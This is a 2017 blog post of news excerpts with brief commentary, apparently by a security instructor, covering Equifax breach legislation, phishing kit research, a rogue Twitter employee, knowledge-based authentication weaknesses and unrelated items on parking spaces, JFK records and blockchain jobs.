Friday, November 03, 2017

What’s bad for Equifax is bad for everyone?
Not surprisingly, states are responding to the Equifax breach, but they are taking different approaches. Here are how two states are responding:
Law.com reports that in New York:
Attorney General Eric Schneiderman is proposing comprehensive legislation to tighten data security laws and expand protections.
The Stop Hacks and Improve Electronic Data Security Act, introduced this week in the Legislature, would require companies that handle New Yorkers’ sensitive data to adopt “reasonable administrative, technical and physical protections for data” regardless of where the company is headquartered, Schneiderman’s office said in a news release Thursday. It would cover credit reporting agencies such as Equifax as well as many other types of companies that collect personally identifiable information on individuals.
And Vermont Public Radio reports:
Chittenden County Sen. Michael Sirotkin says he heard from more constituents about the Equifax breach than almost any other issue he’s dealt with as a lawmaker. Sirotkin says he’s now putting the finishing touches on legislation that would give Vermonters new legal options for similar breaches in the future.
“So what that means is that consumers will have a private right of action, if this bill passes, where they will be able to get their damages for their time and expense and their attorneys’ fees and the cost of repairing the problem,” Sirotkin said Thursday at a press conference announcing the legislation.




Another example of Equifax security?
Equifax Reopens Salary Lookup Service
Equifax has re-opened a Web site that lets anyone look up the salary history of a large portion of the American workforce using little more than a person’s Social Security number and their date of birth. The big-three credit bureau took the site down just hours after I wrote about it on Oct. 8, and began restoring the site eight days later saying it had added unspecified “security enhancements.”




When we’ll help and when we’ll hack.
At a series of events earlier in October, White House Cybersecurity Coordinator Rob Joyce announced that he is preparing to release more information about the Vulnerabilities Equities Process (VEP). 
As we’ve discussed before, the VEP is a complicated yet important process that determines whether the government will notify a digital-technology company about a cybersecurity flaw in its product or service, or choose not to disclose the flaw and use it for later hacking or intelligence-gathering purposes.




A “new tech” security issue.
Shadow IT Growth Introducing Huge Compliance Risks: Report
Shadow IT continues to grow, while senior management remains in denial. The average enterprise now uses 1,232 cloud apps (up 33% from the second half of last year), while CIOs still believe their organizations use between just 30 and 40 cloud apps and services. Within this cloud, 20% of all stored data is at risk from being 'broadly shared'.
The figures come from 1H 2017 Shadow Data Report (PDF), based on aggregated and anonymized data from 22,000 cloud apps and services, 465 million documents, and 2.3 billion emails used by Symantec's CloudSOC (CASB) customers.




For my Ethical Hackers and my Computer Security students.
Analysis of 3,200 Phishing Kits Sheds Light on Attacker Tools and Techniques
Phishing kits are used extensively by cybercriminals to increase the efficiency of stealing user credentials. The basic kit comprises an accurate clone of the target medium's login-in page (Gmail, Facebook, Office 365, targeted banks, etc), and a pre-written php script to steal the credentials -- both bundled and distributed as a zip file. Successfully phished credentials are mailed by the script to the phisher, or gathered in a text file for later collection. This is commodity phishing; not spear-phishing.
Duo Security R&D engineer Jordan Wright found and analyzed a single phishing kit; and decided to investigate the extent of their use. The results were published this week in a new report (PDF).




For my Computer Security student Midterm: How would you prevent this?
Rogue Twitter employee on last day of job deactivated Trump’s personal account, company says
President Trump boasted Friday of his social media influence after his personal Twitter account was briefly deactivated by a departing company employee, raising serious questions about the security of tweets the president wields to set major policy agendas, connect with his voter base and lash out at his adversaries.
The deactivation Thursday sparked deep and troubling questions about who has access to the president's personal account, @realDonaldTrump, and the power that access holds. The deactivation also came at a time when the social network is under scrutiny for the role it played in spreading Russian propaganda during the 2016 presidential election.
at 8:05 p.m., at the same time Trump was tweeting about tax revisions, the company posted a statement saying the president's “account was inadvertently deactivated due to human error by a Twitter employee.”
“The account was down for 11 minutes, and has since been restored,” the statement read. “We are continuing to investigate and are taking steps to prevent this from happening again.”
But two hours later, the company admitted that the deactivation wasn't an accident at all: A preliminary investigation revealed that the account was taken offline “by a Twitter customer support employee who did this on the employee's last day.”


(Related). Another potential question?
Security Sense: How Do You Do Knowledge Based Authentication When All Knowledge is Public?
Have a think about the ways you identify yourself to institutions, both commercial and government. Think about the process you go through in order to establish that you are indeed yourself and it’s not someone else pretending to be you. In particular, consider the sorts of questions you’re asked in order to establish enough confidence on behalf of that institution that they should now proceed with granting you whatever it was you contacted them for in the first place. Very often, you’re asked to partake in what’s referred to as Knowledge Based Authentication or KBA and that’s something we’ve now got a real problem with.
Consider the sorts of questions you’re usually asked, a classic one being your date of birth. This has always been a ludicrous KBA question because it’s a personal attribute we willingly share with others, simply because most of us like cake and presents. Yet we have cases like Betfair using only that and an email address to reset your password. No, you don’t have to actually receive an email, you just simply say “here’s an email and a birthdate and here’s the password I’d like that account to have”. Now that’s an extreme example and I believe they’ve since seen the futility of that approach and made some changes, but date of birth is still frequently a part of the KBA process.




Will this still be a good investment in the age of self-driving cars and Uber-like services?
Parking Spaces That Could Make You Rich
Marc Wisotsky and his partner, Jackie Lew, bought two spaces in 2005 in a parking garage near their home in Park Slope, Brooklyn, for around $45,000 each. They used one and rented out the other for $600 a month, pocketing $310 after taxes and the garage fee.
It was a tidy, reliable income, Mr. Wisotsky said, but the real payoff came when he and Ms. Lew sold their extra space last year for $285,000. “We could have gotten more — the prices just keep going up and up,” he said. “There are never as many parking spaces as residential units being built.”




If you are a JFK conspiracy nut, go away and read this. Great idea for a free demo!
E-discovery firm opens access to fully searchable database of JFK assassination records collection
by Sabrina I. Pacifici on Nov 2, 2017
ABA Journal: “The legal review software company iCONECT has digitized some JFK assassination records and is offering free access for 60 days. Launched Oct. 30, the company imported 6,701 public documents from the John F. Kennedy Assassination Records Collection to its Xera platform, including audio files. A user can now search various fields to find relevant information. This is an improvement over the National Archives’ repository of these documents, which are in PDF format and non-searchable, according to a press release. iCONECT also “built a search index, charts, graphs, quick-search folders and word-highlight reports for all the records,” according to the release. A user can even auto-mark CIA cryptonyms found throughout the document set.”




For the student toolkit.




New is not necessarily mainstream.
Blockchain development is the now second-hottest skill in the job market today, growing more than 200% since this time last year.
Blockchain developers now rank second among the top 20 fastest-growing job skills, and job postings for workers with those skills have more than doubled this year.


(Related)
One Bitcoin Transaction Now Uses as Much Energy as Your House in a Week


No comments: